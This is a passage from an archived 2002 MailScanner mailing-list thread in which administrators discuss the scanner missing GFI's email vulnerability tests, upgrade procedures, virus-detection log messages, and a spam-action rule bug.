a test virus or codes goes through and the mailscanner doesn't detect the embedded scripts in the emails. In version 4, is it possible to scan these kinds of viruses or code? by the way I'm using the stable version of mailscanner 3-22.7 with spamassassin2-31. --- Glynn --- From mike at CAMAROSS.NET Tue Sep 24 03:05:17 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities In-Reply-To: <004301c2636d$c25bb3d0$8201a8c0@proaccessph.com> Message-ID: Try upgrading to 3.22-15 I think Julian got it to detect all of the vulnerabilities. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Glynn S. Condez Sent: Monday, September 23, 2002 8:58 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Email Vulnerabilities Based on these website http://www.gfi.com/emailsecuritytest, some of the test email that contents a test virus or codes goes through and the mailscanner doesn't detect the embedded scripts in the emails. In version 4, is it possible to scan these kinds of viruses or code? by the way I'm using the stable version of mailscanner 3-22.7 with spamassassin2-31. --- Glynn --- From mike at CAMAROSS.NET Tue Sep 24 03:06:32 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities In-Reply-To: <004301c2636d$c25bb3d0$8201a8c0@proaccessph.com> Message-ID: Correction...3.23-1 :) -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Glynn S. Condez Sent: Monday, September 23, 2002 8:58 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Email Vulnerabilities Based on these website http://www.gfi.com/emailsecuritytest, some of the test email that contents a test virus or codes goes through and the mailscanner doesn't detect the embedded scripts in the emails. In version 4, is it possible to scan these kinds of viruses or code? by the way I'm using the stable version of mailscanner 3-22.7 with spamassassin2-31. --- Glynn --- From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 03:02:27 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities References: Message-ID: <005b01c2636e$6edec200$8201a8c0@proaccessph.com> This mailing list is great, the response is so fast :) well I'll do the upgrade, email you guys about the results. thanks --- Glynn --- ----- Original Message ----- From: "Mike Kercher" To: Sent: Tuesday, September 24, 2002 10:05 AM Subject: Re: Email Vulnerabilities > Try upgrading to 3.22-15 I think Julian got it to detect all of the vulnerabilities. > > > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > Behalf Of Glynn S. Condez > Sent: Monday, September 23, 2002 8:58 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Email Vulnerabilities > > > Based on these website http://www.gfi.com/emailsecuritytest, some of the > test email that contents a test virus or codes goes through and the > mailscanner doesn't detect the embedded scripts in the emails. > > In version 4, is it possible to scan these kinds of viruses or code? by the > way I'm using the stable version of mailscanner 3-22.7 with > spamassassin2-31. > > > --- Glynn --- > From jaearick at COLBY.EDU Tue Sep 24 03:12:56 2002 From: jaearick at COLBY.EDU (Jeff A. Earickson) Date: Thu Jan 12 21:15:44 2006 Subject: 3.23-1 swearing like a pirate... Message-ID: Julian, I upgraded from 3.22-14 to 3.23-1 this afternoon and my syslog file looks a wee bit more profane than before. I'm getting a lot of "oh shit" complaints, eg: Sep 23 16:06:21 emerald sendmail[24027]: [ID 801593 mail.info] g8NK6Kjg024027: from=, size=124822, class=0, nrcpts=1, msgid=<20020923200218.UDTX1953.out007.verizon.net@Ffo>, proto=ESMTP, daemon=MTA, relay=out007pub.verizon.net [206.46.170.107] Sep 23 16:06:27 emerald mailscanner[27703]: >>> Virus 'W32/Klez-H' found in file ./g8NK6Kjg024027/HREF.scr Sep 23 16:06:27 emerald mailscanner[27703]: Detected Microsoft-specific exploits in g8NK6Kjg024027 Sep 23 16:06:27 emerald mailscanner[27703]: Found 3 viruses in messages g8NK6Kjg024027 Sep 23 16:06:27 emerald mailscanner[27703]: Oh shit, missed infected entity in message :-( g8NK6Kjg024027 Sep 23 16:06:27 emerald mailscanner[27703]: Deleted infected messages g8NK6Kjg024027 Version 3.23-1 has coughed up this furball 69 times today for me, versus once in the previous two weeks with 3.22-14. Que pasa? ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 ** Senior UNIX Sysadmin, Information Technology EMAIL: jaearick@colby.edu ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 ** Waterville ME, 04901-8842 ---------------------------------------------------------------------------- From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 03:18:03 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities References: <005b01c2636e$6edec200$8201a8c0@proaccessph.com> Message-ID: <007401c26370$9c672e90$8201a8c0@proaccessph.com> oh by the way, this the first time that I am going to upgrade the mailscanner, is it possible if I am going to rename the old mailscanner directory and install the new version of mailscanner as mailscanner? or is there anything that I need to be reconfigure? Thanks --- Glynn --- ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Tuesday, September 24, 2002 10:02 AM Subject: Re: Email Vulnerabilities > This mailing list is great, the response is so fast :) well I'll do the > upgrade, email you guys about the results. > > thanks > > --- Glynn --- > > > ----- Original Message ----- > From: "Mike Kercher" > To: > Sent: Tuesday, September 24, 2002 10:05 AM > Subject: Re: Email Vulnerabilities > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of the > vulnerabilities. > > > > > > -----Original Message----- > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > Behalf Of Glynn S. Condez > > Sent: Monday, September 23, 2002 8:58 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Email Vulnerabilities > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some of the > > test email that contents a test virus or codes goes through and the > > mailscanner doesn't detect the embedded scripts in the emails. > > > > In version 4, is it possible to scan these kinds of viruses or code? by > the > > way I'm using the stable version of mailscanner 3-22.7 with > > spamassassin2-31. > > > > > > --- Glynn --- > > > From james at un.net.au Tue Sep 24 03:28:39 2002 From: james at un.net.au (James Murchison) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities In-Reply-To: <007401c26370$9c672e90$8201a8c0@proaccessph.com> Message-ID: <000301c26372$17f18140$6401a8c0@jamesdesktop> Did you use an RPM to install orig ?? -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Glynn S. Condez Sent: Tuesday, 24 September 2002 12:18 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Email Vulnerabilities oh by the way, this the first time that I am going to upgrade the mailscanner, is it possible if I am going to rename the old mailscanner directory and install the new version of mailscanner as mailscanner? or is there anything that I need to be reconfigure? Thanks --- Glynn --- ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Tuesday, September 24, 2002 10:02 AM Subject: Re: Email Vulnerabilities > This mailing list is great, the response is so fast :) well I'll do > the upgrade, email you guys about the results. > > thanks > > --- Glynn --- > > > ----- Original Message ----- > From: "Mike Kercher" > To: > Sent: Tuesday, September 24, 2002 10:05 AM > Subject: Re: Email Vulnerabilities > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of the > vulnerabilities. > > > > > > -----Original Message----- > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > Behalf Of Glynn S. Condez > > Sent: Monday, September 23, 2002 8:58 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Email Vulnerabilities > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some > > of the > > test email that contents a test virus or codes goes through and the > > mailscanner doesn't detect the embedded scripts in the emails. > > > > In version 4, is it possible to scan these kinds of viruses or code? > > by > the > > way I'm using the stable version of mailscanner 3-22.7 with > > spamassassin2-31. > > > > > > --- Glynn --- > > > From mike at CAMAROSS.NET Tue Sep 24 03:28:38 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities In-Reply-To: <007401c26370$9c672e90$8201a8c0@proaccessph.com> Message-ID: Are you going the RPM route? Either way, there are lots of changes in the mailscanner.conf, so you're just as well starting fresh. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Glynn S. Condez Sent: Monday, September 23, 2002 9:18 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Email Vulnerabilities oh by the way, this the first time that I am going to upgrade the mailscanner, is it possible if I am going to rename the old mailscanner directory and install the new version of mailscanner as mailscanner? or is there anything that I need to be reconfigure? Thanks --- Glynn --- ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Tuesday, September 24, 2002 10:02 AM Subject: Re: Email Vulnerabilities > This mailing list is great, the response is so fast :) well I'll do the > upgrade, email you guys about the results. > > thanks > > --- Glynn --- > > > ----- Original Message ----- > From: "Mike Kercher" > To: > Sent: Tuesday, September 24, 2002 10:05 AM > Subject: Re: Email Vulnerabilities > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of the > vulnerabilities. > > > > > > -----Original Message----- > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > Behalf Of Glynn S. Condez > > Sent: Monday, September 23, 2002 8:58 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Email Vulnerabilities > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some of the > > test email that contents a test virus or codes goes through and the > > mailscanner doesn't detect the embedded scripts in the emails. > > > > In version 4, is it possible to scan these kinds of viruses or code? by > the > > way I'm using the stable version of mailscanner 3-22.7 with > > spamassassin2-31. > > > > > > --- Glynn --- > > > From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 03:31:49 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities References: Message-ID: <009701c26372$89647940$8201a8c0@proaccessph.com> I did it in tar mode and I am going to install the new version in tar mode also. Is there any thing I need to do? --- Glynn --- ----- Original Message ----- From: "Mike Kercher" To: Sent: Tuesday, September 24, 2002 10:28 AM Subject: Re: Email Vulnerabilities > Are you going the RPM route? Either way, there are lots of changes in the mailscanner.conf, so you're just as well starting fresh. > > > > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > Behalf Of Glynn S. Condez > Sent: Monday, September 23, 2002 9:18 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: Email Vulnerabilities > > > oh by the way, this the first time that I am going to upgrade the > mailscanner, is it possible if I am going to rename the old mailscanner > directory and install the new version of mailscanner as mailscanner? > > or is there anything that I need to be reconfigure? > > Thanks > --- Glynn --- > > ----- Original Message ----- > From: "Glynn S. Condez" > To: > Sent: Tuesday, September 24, 2002 10:02 AM > Subject: Re: Email Vulnerabilities > > > > This mailing list is great, the response is so fast :) well I'll do the > > upgrade, email you guys about the results. > > > > thanks > > > > --- Glynn --- > > > > > > ----- Original Message ----- > > From: "Mike Kercher" > > To: > > Sent: Tuesday, September 24, 2002 10:05 AM > > Subject: Re: Email Vulnerabilities > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of the > > vulnerabilities. > > > > > > > > > -----Original Message----- > > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > Behalf Of Glynn S. Condez > > > Sent: Monday, September 23, 2002 8:58 PM > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: Email Vulnerabilities > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some of > the > > > test email that contents a test virus or codes goes through and the > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > In version 4, is it possible to scan these kinds of viruses or code? by > > the > > > way I'm using the stable version of mailscanner 3-22.7 with > > > spamassassin2-31. > > > > > > > > > --- Glynn --- > > > > > > From jaearick at COLBY.EDU Tue Sep 24 03:28:24 2002 From: jaearick at COLBY.EDU (Jeff A. Earickson) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities In-Reply-To: <007401c26370$9c672e90$8201a8c0@proaccessph.com> Message-ID: Hi, I set up my mailscanner directory thus: lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> bin-3.23-1/ drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> etc-3.23-1/ drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ drwxr-xr-x 3 root none 512 May 2 11:52 man/ drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ drwx------ 4 root none 512 May 3 09:38 var/ When a new version of mailscanner comes out, I untar it and move the mailscanner/etc and mailscanner/bin directories to etc-[version] and bin-[version]. Then I do side-by-side comparisons of the default config versus my setup. When I've carried my config changes into the new etc files, I stop mailscanner, change the symlinks, restart mailscanner. Virtually no down time. It would be nice if this kind of directory versioning was incorporated into the tarfiles for v4 somehow... ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 ** Senior UNIX Sysadmin, Information Technology EMAIL: jaearick@colby.edu ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 ** Waterville ME, 04901-8842 ---------------------------------------------------------------------------- On Tue, 24 Sep 2002, Glynn S. Condez wrote: > Date: Tue, 24 Sep 2002 10:18:03 +0800 > From: Glynn S. Condez > Reply-To: MailScanner mailing list > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: Email Vulnerabilities > > oh by the way, this the first time that I am going to upgrade the > mailscanner, is it possible if I am going to rename the old mailscanner > directory and install the new version of mailscanner as mailscanner? > > or is there anything that I need to be reconfigure? > > Thanks > --- Glynn --- > > ----- Original Message ----- > From: "Glynn S. Condez" > To: > Sent: Tuesday, September 24, 2002 10:02 AM > Subject: Re: Email Vulnerabilities > > > > This mailing list is great, the response is so fast :) well I'll do the > > upgrade, email you guys about the results. > > > > thanks > > > > --- Glynn --- > > > > > > ----- Original Message ----- > > From: "Mike Kercher" > > To: > > Sent: Tuesday, September 24, 2002 10:05 AM > > Subject: Re: Email Vulnerabilities > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of the > > vulnerabilities. > > > > > > > > > -----Original Message----- > > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > Behalf Of Glynn S. Condez > > > Sent: Monday, September 23, 2002 8:58 PM > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: Email Vulnerabilities > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some of > the > > > test email that contents a test virus or codes goes through and the > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > In version 4, is it possible to scan these kinds of viruses or code? by > > the > > > way I'm using the stable version of mailscanner 3-22.7 with > > > spamassassin2-31. > > > > > > > > > --- Glynn --- > > > > > > From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 03:37:35 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities References: Message-ID: <009f01c26373$572fe260$8201a8c0@proaccessph.com> Thanks Jeff for the great idea, it seems that there's nothing that I need to reconfigure except for the conf files of mailscanner. --- Glynn --- ----- Original Message ----- From: "Jeff A. Earickson" To: Sent: Tuesday, September 24, 2002 10:28 AM Subject: Re: Email Vulnerabilities > Hi, > I set up my mailscanner directory thus: > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> bin-3.23-1/ > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> etc-3.23-1/ > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > drwx------ 4 root none 512 May 3 09:38 var/ > > When a new version of mailscanner comes out, I untar it and move the > mailscanner/etc and mailscanner/bin directories to etc-[version] > and bin-[version]. Then I do side-by-side comparisons of the default > config versus my setup. When I've carried my config changes into the > new etc files, I stop mailscanner, change the symlinks, restart > mailscanner. Virtually no down time. It would be nice if this > kind of directory versioning was incorporated into the tarfiles > for v4 somehow... > > ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 > ** Senior UNIX Sysadmin, Information Technology EMAIL: jaearick@colby.edu > ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 > ** Waterville ME, 04901-8842 > -------------------------------------------------------------------------- -- > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > From: Glynn S. Condez > > Reply-To: MailScanner mailing list > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: Email Vulnerabilities > > > > oh by the way, this the first time that I am going to upgrade the > > mailscanner, is it possible if I am going to rename the old mailscanner > > directory and install the new version of mailscanner as mailscanner? > > > > or is there anything that I need to be reconfigure? > > > > Thanks > > --- Glynn --- > > > > ----- Original Message ----- > > From: "Glynn S. Condez" > > To: > > Sent: Tuesday, September 24, 2002 10:02 AM > > Subject: Re: Email Vulnerabilities > > > > > > > This mailing list is great, the response is so fast :) well I'll do the > > > upgrade, email you guys about the results. > > > > > > thanks > > > > > > --- Glynn --- > > > > > > > > > ----- Original Message ----- > > > From: "Mike Kercher" > > > To: > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of the > > > vulnerabilities. > > > > > > > > > > > > -----Original Message----- > > > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > Behalf Of Glynn S. Condez > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some of > > the > > > > test email that contents a test virus or codes goes through and the > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > In version 4, is it possible to scan these kinds of viruses or code? by > > > the > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > spamassassin2-31. > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > From brose at MED.WAYNE.EDU Tue Sep 24 03:50:50 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00 Spam Action rule file bug?? Message-ID: If I set spam action to a rule file and set the rule similar to below To: user@domain.com forward spam@domain.com It's forwarded If I set it to To: user@domain.com bounce forward spam@domain.com It bounced and forwarded. If I set to To: user@domain.com bounce delete forward spam@domain.com Then I get RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 at MailScanner/RBLs.pm line 192 On the console and this in the log Sep 23 22:40:09 apollo.med.wayne.edu MailScanner[13257]: RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 Amd all I get is the bounce. If I set the rule to To: user@domain.com bounce delete Then I get a bounce and the deletion as expected. If I set to To: user@domain.com delete forward spam@domain.com Then the message is just deleted. So it almost seems that delete and forward options can't be used together. -=Bobby From mike at CAMAROSS.NET Tue Sep 24 04:03:07 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00 Spam Action rule file bug?? In-Reply-To: Message-ID: If I set to To: user@domain.com delete forward spam@domain.com Then the message is just deleted. What if you were to make this read: To: user@domain.com forward spam@domain.com delete In other words, make the delete the last action performed... -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Rose, Bobby Sent: Monday, September 23, 2002 9:51 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Version 4.00 Spam Action rule file bug?? If I set spam action to a rule file and set the rule similar to below To: user@domain.com forward spam@domain.com It's forwarded If I set it to To: user@domain.com bounce forward spam@domain.com It bounced and forwarded. If I set to To: user@domain.com bounce delete forward spam@domain.com Then I get RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 at MailScanner/RBLs.pm line 192 On the console and this in the log Sep 23 22:40:09 apollo.med.wayne.edu MailScanner[13257]: RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 Amd all I get is the bounce. If I set the rule to To: user@domain.com bounce delete Then I get a bounce and the deletion as expected. If I set to To: user@domain.com delete forward spam@domain.com Then the message is just deleted. So it almost seems that delete and forward options can't be used together. -=Bobby From brose at MED.WAYNE.EDU Tue Sep 24 04:34:53 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00 Spam Action rule file bug?? Message-ID: I thought of that too but it also gave me RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 at MailScanner/RBLs.pm line 192 On the console and this in the log Sep 23 22:40:09 apollo.med.wayne.edu MailScanner[13257]: RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 Amd all I get is the bounce. -----Original Message----- From: Mike Kercher [mailto:mike@CAMAROSS.NET] Sent: Monday, September 23, 2002 11:03 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Version 4.00 Spam Action rule file bug?? If I set to To: user@domain.com delete forward spam@domain.com Then the message is just deleted. What if you were to make this read: To: user@domain.com forward spam@domain.com delete In other words, make the delete the last action performed... -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Rose, Bobby Sent: Monday, September 23, 2002 9:51 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Version 4.00 Spam Action rule file bug?? If I set spam action to a rule file and set the rule similar to below To: user@domain.com forward spam@domain.com It's forwarded If I set it to To: user@domain.com bounce forward spam@domain.com It bounced and forwarded. If I set to To: user@domain.com bounce delete forward spam@domain.com Then I get RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 at MailScanner/RBLs.pm line 192 On the console and this in the log Sep 23 22:40:09 apollo.med.wayne.edu MailScanner[13257]: RBL Check ORDB-RBL timed out and was killed, consecutive failure 1 of 7 Amd all I get is the bounce. If I set the rule to To: user@domain.com bounce delete Then I get a bounce and the deletion as expected. If I set to To: user@domain.com delete forward spam@domain.com Then the message is just deleted. So it almost seems that delete and forward options can't be used together. -=Bobby From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 05:54:24 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities References: <009f01c26373$572fe260$8201a8c0@proaccessph.com> Message-ID: <013e01c26386$742897a0$8201a8c0@proaccessph.com> Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I have found out is the speed, its more faster now and the the vulnerability test from GFI doesn't work anyone. One thing I am wondering with, why does this eicar.com gfi test email goes to my outlook express deleted items with a modified subject {VIRUS?} eicar.com [1/5] up to [5/5] and theres no warning message in the body and the attachment is intact with the filename eicar.com. im just wondering about this. Also, I am using Sophos and I got this message in my console "Useful life of SWEEP has beed exceeded" does the Sophos doesn't work anymore? --- Glynn --- ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Tuesday, September 24, 2002 10:37 AM Subject: Re: Email Vulnerabilities > Thanks Jeff for the great idea, it seems that there's nothing that I need > to reconfigure except for the conf files of mailscanner. > > > --- Glynn --- > > ----- Original Message ----- > From: "Jeff A. Earickson" > To: > Sent: Tuesday, September 24, 2002 10:28 AM > Subject: Re: Email Vulnerabilities > > > > Hi, > > I set up my mailscanner directory thus: > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> bin-3.23-1/ > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> etc-3.23-1/ > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > When a new version of mailscanner comes out, I untar it and move the > > mailscanner/etc and mailscanner/bin directories to etc-[version] > > and bin-[version]. Then I do side-by-side comparisons of the default > > config versus my setup. When I've carried my config changes into the > > new etc files, I stop mailscanner, change the symlinks, restart > > mailscanner. Virtually no down time. It would be nice if this > > kind of directory versioning was incorporated into the tarfiles > > for v4 somehow... > > > > ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > jaearick@colby.edu > > ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 > > ** Waterville ME, 04901-8842 > > -------------------------------------------------------------------------- > -- > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > From: Glynn S. Condez > > > Reply-To: MailScanner mailing list > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: Re: Email Vulnerabilities > > > > > > oh by the way, this the first time that I am going to upgrade the > > > mailscanner, is it possible if I am going to rename the old mailscanner > > > directory and install the new version of mailscanner as mailscanner? > > > > > > or is there anything that I need to be reconfigure? > > > > > > Thanks > > > --- Glynn --- > > > > > > ----- Original Message ----- > > > From: "Glynn S. Condez" > > > To: > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > This mailing list is great, the response is so fast :) well I'll do > the > > > > upgrade, email you guys about the results. > > > > > > > > thanks > > > > > > > > --- Glynn --- > > > > > > > > > > > > ----- Original Message ----- > > > > From: "Mike Kercher" > > > > To: > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of the > > > > vulnerabilities. > > > > > > > > > > > > > > > -----Original Message----- > > > > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > Behalf Of Glynn S. Condez > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some > of > > > the > > > > > test email that contents a test virus or codes goes through and the > > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses or code? > by > > > > the > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > spamassassin2-31. > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > From james at un.net.au Tue Sep 24 06:09:36 2002 From: james at un.net.au (James Murchison) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities In-Reply-To: <013e01c26386$742897a0$8201a8c0@proaccessph.com> Message-ID: <000301c26388$93d61c60$6401a8c0@jamesdesktop> If your not getting the Virus Warning message the Scanner (Sweep) isn't working. The {VIRUS} message is probably being generated by the allowed files routine. If you have set your e-mail address as the postmaster, you should receive at least two messages (probably 3) 1 the return warning 2 the Postmaster warning and 3 the original message stripped. KR J. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Glynn S. Condez Sent: Tuesday, 24 September 2002 2:54 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Email Vulnerabilities Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I have found out is the speed, its more faster now and the the vulnerability test from GFI doesn't work anyone. One thing I am wondering with, why does this eicar.com gfi test email goes to my outlook express deleted items with a modified subject {VIRUS?} eicar.com [1/5] up to [5/5] and theres no warning message in the body and the attachment is intact with the filename eicar.com. im just wondering about this. Also, I am using Sophos and I got this message in my console "Useful life of SWEEP has beed exceeded" does the Sophos doesn't work anymore? --- Glynn --- ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Tuesday, September 24, 2002 10:37 AM Subject: Re: Email Vulnerabilities > Thanks Jeff for the great idea, it seems that there's nothing that I > need to reconfigure except for the conf files of mailscanner. > > > --- Glynn --- > > ----- Original Message ----- > From: "Jeff A. Earickson" > To: > Sent: Tuesday, September 24, 2002 10:28 AM > Subject: Re: Email Vulnerabilities > > > > Hi, > > I set up my mailscanner directory thus: > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> bin-3.23-1/ > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> etc-3.23-1/ > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > When a new version of mailscanner comes out, I untar it and move the > > mailscanner/etc and mailscanner/bin directories to etc-[version] and > > bin-[version]. Then I do side-by-side comparisons of the default > > config versus my setup. When I've carried my config changes into > > the new etc files, I stop mailscanner, change the symlinks, restart > > mailscanner. Virtually no down 